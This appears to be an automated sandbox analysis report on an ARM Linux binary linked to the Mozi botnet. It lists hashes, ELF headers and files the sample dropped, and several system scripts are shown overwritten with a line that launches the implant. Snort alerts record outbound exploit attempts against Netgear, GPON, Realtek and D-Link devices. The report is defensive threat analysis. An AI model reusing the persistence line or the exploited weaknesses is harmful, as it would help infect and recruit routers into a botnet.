                                                                                                          Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                          /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2564
                                                                                                          Entropy (8bit):5.346461718403454
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                          MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                          SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                          SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                          SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                          Malicious:false
                                                                                                          Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                          /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9649
                                                                                                          Entropy (8bit):5.350733164859712
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                          MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                          SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                          SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                          SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                          Malicious:false
                                                                                                          Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                          /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):46
                                                                                                          Entropy (8bit):3.925523369006428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                          MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                          SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                          SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                          SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:false
                                                                                                          Preview: ./usr/networks&.exit 1.

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                          Entropy (8bit):5.819679405566689
                                                                                                          TrID:
                                                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                          File name:i
                                                                                                          File size:307960
                                                                                                          MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                          SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                          SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                          SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                          SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                          File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                          Static ELF Info

                                                                                                          ELF header

                                                                                                          Class:ELF32
                                                                                                          Data:2's complement, little endian
                                                                                                          Version:1 (current)
                                                                                                          Machine:ARM
                                                                                                          Version Number:0x1
                                                                                                          Type:EXEC (Executable file)
                                                                                                          OS/ABI:UNIX - System V
                                                                                                          ABI Version:0
                                                                                                          Entry Point Address:0x8194
                                                                                                          Flags:0x4000002
                                                                                                          ELF Header Size:52
                                                                                                          Program Header Offset:52
                                                                                                          Program Header Size:32
                                                                                                          Number of Program Headers:5
                                                                                                          Section Header Offset:307280
                                                                                                          Section Header Size:40
                                                                                                          Number of Section Headers:17
                                                                                                          Header String Table Index:16

                                                                                                          Sections

                                                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                          NULL0x00x00x00x00x0000
                                                                                                          .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                          .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                          .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                          .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                          .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                          .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                          .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                          .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                          .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                          .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                          .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                          .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                          .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                          .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                          .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                          .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                          Program Segments

                                                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                          EXIDX0x405800x485800x485800x1280x1280x4R 0x4.ARM.exidx
                                                                                                          LOAD0x00x80000x80000x406a80x406a80x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                          LOAD0x410000x510000x510000x9fa80x2fb380x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                          TLS0x410040x510040x510040x00x80x4R 0x4
                                                                                                          GNU_STACK0x00x00x00x00x00x7RWE0x4

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          01/06/21-19:31:16.017957ICMP402ICMP Destination Unreachable Port Unreachable134.58.253.43192.168.2.20
                                                                                                          01/06/21-19:31:16.022233ICMP399ICMP Destination Unreachable Host Unreachable185.189.124.1192.168.2.20
                                                                                                          01/06/21-19:31:16.097773ICMP401ICMP Destination Unreachable Network Unreachable38.126.144.18192.168.2.20
                                                                                                          01/06/21-19:31:17.165092ICMP399ICMP Destination Unreachable Host Unreachable64.59.147.234192.168.2.20
                                                                                                          01/06/21-19:31:22.421300ICMP449ICMP Time-To-Live Exceeded in Transit111.118.1.34192.168.2.20
                                                                                                          01/06/21-19:31:25.010957ICMP449ICMP Time-To-Live Exceeded in Transit10.7.145.191192.168.2.20
                                                                                                          01/06/21-19:31:25.018260ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.247.205.165192.168.2.20
                                                                                                          01/06/21-19:31:25.034021ICMP449ICMP Time-To-Live Exceeded in Transit78.77.181.70192.168.2.20
                                                                                                          01/06/21-19:31:25.042281ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited193.8.201.1192.168.2.20
                                                                                                          01/06/21-19:31:25.042507ICMP485ICMP Destination Unreachable Communication Administratively Prohibited92.86.244.254192.168.2.20
                                                                                                          01/06/21-19:31:25.073119ICMP449ICMP Time-To-Live Exceeded in Transit89.222.201.34192.168.2.20
                                                                                                          01/06/21-19:31:25.140449ICMP402ICMP Destination Unreachable Port Unreachable194.166.99.241192.168.2.20
                                                                                                          01/06/21-19:31:25.142987ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.248.64.225192.168.2.20
                                                                                                          01/06/21-19:31:25.214121ICMP449ICMP Time-To-Live Exceeded in Transit177.185.2.147192.168.2.20
                                                                                                          01/06/21-19:31:25.259771ICMP449ICMP Time-To-Live Exceeded in Transit161.31.0.30192.168.2.20
                                                                                                          01/06/21-19:31:25.278211ICMP402ICMP Destination Unreachable Port Unreachable96.2.68.189192.168.2.20
                                                                                                          01/06/21-19:31:25.338251ICMP449ICMP Time-To-Live Exceeded in Transit192.168.3.34192.168.2.20
                                                                                                          01/06/21-19:31:27.743358ICMP399ICMP Destination Unreachable Host Unreachable155.133.140.7192.168.2.20
                                                                                                          01/06/21-19:31:28.166760ICMP399ICMP Destination Unreachable Host Unreachable98.218.86.82192.168.2.20
                                                                                                          01/06/21-19:31:29.366172ICMP449ICMP Time-To-Live Exceeded in Transit103.253.208.202192.168.2.20
                                                                                                          01/06/21-19:31:32.454982ICMP399ICMP Destination Unreachable Host Unreachable100.72.250.150192.168.2.20
                                                                                                          01/06/21-19:31:33.924707ICMP449ICMP Time-To-Live Exceeded in Transit147.97.27.145192.168.2.20
                                                                                                          01/06/21-19:31:35.457932ICMP399ICMP Destination Unreachable Host Unreachable100.72.250.150192.168.2.20
                                                                                                          01/06/21-19:31:36.196664ICMP401ICMP Destination Unreachable Network Unreachable81.228.95.181192.168.2.20
                                                                                                          01/06/21-19:31:36.287798ICMP449ICMP Time-To-Live Exceeded in Transit192.168.35.130192.168.2.20
                                                                                                          01/06/21-19:31:36.348935ICMP399ICMP Destination Unreachable Host Unreachable197.234.74.25192.168.2.20
                                                                                                          01/06/21-19:31:36.304547TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound3916880192.168.2.20212.12.160.58
                                                                                                          01/06/21-19:31:36.304547TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution3916880192.168.2.20212.12.160.58
                                                                                                          01/06/21-19:31:36.373511ICMP449ICMP Time-To-Live Exceeded in Transit10.10.76.13192.168.2.20
                                                                                                          01/06/21-19:31:36.380708ICMP449ICMP Time-To-Live Exceeded in Transit10.6.2.1192.168.2.20
                                                                                                          01/06/21-19:31:36.420352ICMP485ICMP Destination Unreachable Communication Administratively Prohibited168.95.22.153192.168.2.20
                                                                                                          01/06/21-19:31:36.860964ICMP449ICMP Time-To-Live Exceeded in Transit147.97.27.145192.168.2.20
                                                                                                          01/06/21-19:31:39.250956ICMP399ICMP Destination Unreachable Host Unreachable217.198.241.130192.168.2.20
                                                                                                          01/06/21-19:31:39.250988ICMP399ICMP Destination Unreachable Host Unreachable217.198.241.130192.168.2.20
                                                                                                          01/06/21-19:31:39.251004ICMP399ICMP Destination Unreachable Host Unreachable217.198.241.130192.168.2.20
                                                                                                          01/06/21-19:31:39.664235UDP2030919ET TROJAN Mozi Botnet DHT Config Sent80032853759.92.218.209192.168.2.20
                                                                                                          01/06/21-19:31:41.013478UDP2030919ET TROJAN Mozi Botnet DHT Config Sent4479028537185.246.176.157192.168.2.20
                                                                                                          01/06/21-19:31:41.706690UDP2030919ET TROJAN Mozi Botnet DHT Config Sent112112853785.106.8.102192.168.2.20
                                                                                                          01/06/21-19:31:41.958613UDP2030919ET TROJAN Mozi Botnet DHT Config Sent190028537178.141.74.98192.168.2.20
                                                                                                          01/06/21-19:31:44.367494ICMP449ICMP Time-To-Live Exceeded in Transit169.255.216.50192.168.2.20
                                                                                                          01/06/21-19:31:44.555050TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3828280192.168.2.20203.152.217.144
                                                                                                          01/06/21-19:31:44.555050TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3828280192.168.2.20203.152.217.144
                                                                                                          01/06/21-19:31:45.178463UDP2030919ET TROJAN Mozi Botnet DHT Config Sent416822853758.97.206.33192.168.2.20
                                                                                                          01/06/21-19:31:46.403184ICMP399ICMP Destination Unreachable Host Unreachable179.60.135.131192.168.2.20
                                                                                                          01/06/21-19:31:46.403212ICMP399ICMP Destination Unreachable Host Unreachable179.60.135.131192.168.2.20
                                                                                                          01/06/21-19:31:46.627204UDP2030919ET TROJAN Mozi Botnet DHT Config Sent808328537220.124.130.66192.168.2.20
                                                                                                          01/06/21-19:31:47.611158UDP2030919ET TROJAN Mozi Botnet DHT Config Sent3192128537111.92.80.183192.168.2.20
                                                                                                          01/06/21-19:31:49.407814ICMP399ICMP Destination Unreachable Host Unreachable179.60.135.131192.168.2.20
                                                                                                          01/06/21-19:31:50.282008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3729652869192.168.2.20195.231.168.45
                                                                                                          01/06/21-19:31:52.468417UDP2030919ET TROJAN Mozi Botnet DHT Config Sent80822853714.46.31.88192.168.2.20
                                                                                                          01/06/21-19:31:52.472949ICMP399ICMP Destination Unreachable Host Unreachable62.39.248.1192.168.2.20
                                                                                                          01/06/21-19:31:53.268168ICMP399ICMP Destination Unreachable Host Unreachable24.124.226.154192.168.2.20
                                                                                                          01/06/21-19:31:53.430530ICMP399ICMP Destination Unreachable Host Unreachable10.63.129.146192.168.2.20
                                                                                                          01/06/21-19:31:53.430565ICMP399ICMP Destination Unreachable Host Unreachable10.63.129.146192.168.2.20
                                                                                                          01/06/21-19:31:57.167316ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                          01/06/21-19:31:57.349856ICMP449ICMP Time-To-Live Exceeded in Transit202.73.96.26192.168.2.20
                                                                                                          01/06/21-19:31:58.173613ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                          01/06/21-19:32:00.231443ICMP449ICMP Time-To-Live Exceeded in Transit80.80.255.99192.168.2.20
                                                                                                          01/06/21-19:32:04.209446ICMP485ICMP Destination Unreachable Communication Administratively Prohibited80.101.88.85192.168.2.20
                                                                                                          01/06/21-19:32:05.384128ICMP449ICMP Time-To-Live Exceeded in Transit185.16.37.4192.168.2.20
                                                                                                          01/06/21-19:32:07.346611ICMP399ICMP Destination Unreachable Host Unreachable85.185.211.1192.168.2.20
                                                                                                          01/06/21-19:32:07.346649ICMP399ICMP Destination Unreachable Host Unreachable85.185.211.1192.168.2.20
                                                                                                          01/06/21-19:32:07.346660ICMP399ICMP Destination Unreachable Host Unreachable85.185.211.1192.168.2.20
                                                                                                          01/06/21-19:32:07.417709ICMP399ICMP Destination Unreachable Host Unreachable172.16.6.189192.168.2.20
                                                                                                          01/06/21-19:32:11.264179ICMP399ICMP Destination Unreachable Host Unreachable145.125.0.17192.168.2.20
                                                                                                          01/06/21-19:32:11.295073ICMP449ICMP Time-To-Live Exceeded in Transit103.145.9.254192.168.2.20
                                                                                                          01/06/21-19:32:12.515289ICMP399ICMP Destination Unreachable Host Unreachable201.6.73.34192.168.2.20
                                                                                                          01/06/21-19:32:14.219207ICMP399ICMP Destination Unreachable Host Unreachable2.45.82.213192.168.2.20
                                                                                                          01/06/21-19:32:14.219229ICMP399ICMP Destination Unreachable Host Unreachable2.45.82.213192.168.2.20
                                                                                                          01/06/21-19:32:14.341220ICMP399ICMP Destination Unreachable Host Unreachable63.224.11.110192.168.2.20
                                                                                                          01/06/21-19:32:14.341286ICMP399ICMP Destination Unreachable Host Unreachable63.224.11.110192.168.2.20
                                                                                                          01/06/21-19:32:14.341530ICMP399ICMP Destination Unreachable Host Unreachable63.224.11.110192.168.2.20
                                                                                                          01/06/21-19:32:14.630421ICMP402ICMP Destination Unreachable Port Unreachable39.109.182.132192.168.2.20
                                                                                                          01/06/21-19:32:15.277038ICMP399ICMP Destination Unreachable Host Unreachable172.242.65.250192.168.2.20
                                                                                                          01/06/21-19:32:15.357977ICMP399ICMP Destination Unreachable Host Unreachable172.242.65.250192.168.2.20
                                                                                                          01/06/21-19:32:15.396899ICMP399ICMP Destination Unreachable Host Unreachable172.242.65.250192.168.2.20
                                                                                                          01/06/21-19:32:17.220912ICMP399ICMP Destination Unreachable Host Unreachable2.45.82.213192.168.2.20
                                                                                                          01/06/21-19:32:18.189580ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.232.198.189192.168.2.20
                                                                                                          01/06/21-19:32:18.319674ICMP485ICMP Destination Unreachable Communication Administratively Prohibited174.58.192.2192.168.2.20
                                                                                                          01/06/21-19:32:18.534116ICMP399ICMP Destination Unreachable Host Unreachable24.229.52.33192.168.2.20
                                                                                                          01/06/21-19:32:18.534136ICMP399ICMP Destination Unreachable Host Unreachable24.229.52.33192.168.2.20
                                                                                                          01/06/21-19:32:20.316781ICMP399ICMP Destination Unreachable Host Unreachable172.242.65.250192.168.2.20
                                                                                                          01/06/21-19:32:21.407489ICMP449ICMP Time-To-Live Exceeded in Transit172.29.255.227192.168.2.20
                                                                                                          01/06/21-19:32:21.534038ICMP399ICMP Destination Unreachable Host Unreachable24.229.52.33192.168.2.20
                                                                                                          01/06/21-19:32:23.478913ICMP402ICMP Destination Unreachable Port Unreachable95.90.228.207192.168.2.20
                                                                                                          01/06/21-19:32:23.783057ICMP399ICMP Destination Unreachable Host Unreachable184.104.205.170192.168.2.20
                                                                                                          01/06/21-19:32:25.185755ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.34.62.97192.168.2.20
                                                                                                          01/06/21-19:32:25.188406ICMP449ICMP Time-To-Live Exceeded in Transit87.48.154.10192.168.2.20
                                                                                                          01/06/21-19:32:25.201319ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.233.121.196192.168.2.20
                                                                                                          01/06/21-19:32:25.386026ICMP449ICMP Time-To-Live Exceeded in Transit69.59.210.153192.168.2.20
                                                                                                          01/06/21-19:32:26.428150ICMP449ICMP Time-To-Live Exceeded in Transit165.233.231.5192.168.2.20
                                                                                                          01/06/21-19:32:28.323114ICMP399ICMP Destination Unreachable Host Unreachable128.32.0.101192.168.2.20
                                                                                                          01/06/21-19:32:28.323156ICMP399ICMP Destination Unreachable Host Unreachable128.32.0.101192.168.2.20
                                                                                                          01/06/21-19:32:28.525873ICMP399ICMP Destination Unreachable Host Unreachable103.126.52.162192.168.2.20
                                                                                                          01/06/21-19:32:28.525897ICMP399ICMP Destination Unreachable Host Unreachable103.126.52.162192.168.2.20
                                                                                                          01/06/21-19:32:28.525907ICMP399ICMP Destination Unreachable Host Unreachable103.126.52.162192.168.2.20
                                                                                                          01/06/21-19:32:31.327102ICMP399ICMP Destination Unreachable Host Unreachable128.32.0.101192.168.2.20
                                                                                                          01/06/21-19:32:32.341323ICMP401ICMP Destination Unreachable Network Unreachable158.165.7.160192.168.2.20
                                                                                                          01/06/21-19:32:35.397327ICMP399ICMP Destination Unreachable Host Unreachable211.180.27.182192.168.2.20
                                                                                                          01/06/21-19:32:35.397352ICMP399ICMP Destination Unreachable Host Unreachable211.180.27.182192.168.2.20
                                                                                                          01/06/21-19:32:35.423949ICMP402ICMP Destination Unreachable Port Unreachable50.67.62.123192.168.2.20
                                                                                                          01/06/21-19:32:35.667014TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4355280192.168.2.20132.64.170.45
                                                                                                          01/06/21-19:32:35.667014TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4355280192.168.2.20132.64.170.45
                                                                                                          01/06/21-19:32:25.400197TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4438880192.168.2.2071.41.225.74
                                                                                                          01/06/21-19:32:38.398208ICMP399ICMP Destination Unreachable Host Unreachable211.180.27.182192.168.2.20
                                                                                                          01/06/21-19:32:39.200188ICMP485ICMP Destination Unreachable Communication Administratively Prohibited62.158.215.92192.168.2.20
                                                                                                          01/06/21-19:32:39.335379ICMP402ICMP Destination Unreachable Port Unreachable107.179.56.165192.168.2.20
                                                                                                          01/06/21-19:32:39.348707ICMP449ICMP Time-To-Live Exceeded in Transit58.65.240.14192.168.2.20
                                                                                                          01/06/21-19:32:39.383860ICMP399ICMP Destination Unreachable Host Unreachable83.84.84.186192.168.2.20
                                                                                                          01/06/21-19:32:42.404164ICMP399ICMP Destination Unreachable Host Unreachable172.249.219.236192.168.2.20
                                                                                                          01/06/21-19:32:42.408637ICMP399ICMP Destination Unreachable Host Unreachable172.249.219.236192.168.2.20
                                                                                                          01/06/21-19:32:43.459608TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound3316680192.168.2.20149.129.130.58
                                                                                                          01/06/21-19:32:43.459608TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution3316680192.168.2.20149.129.130.58
                                                                                                          01/06/21-19:32:46.236865ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.231.181.161192.168.2.20
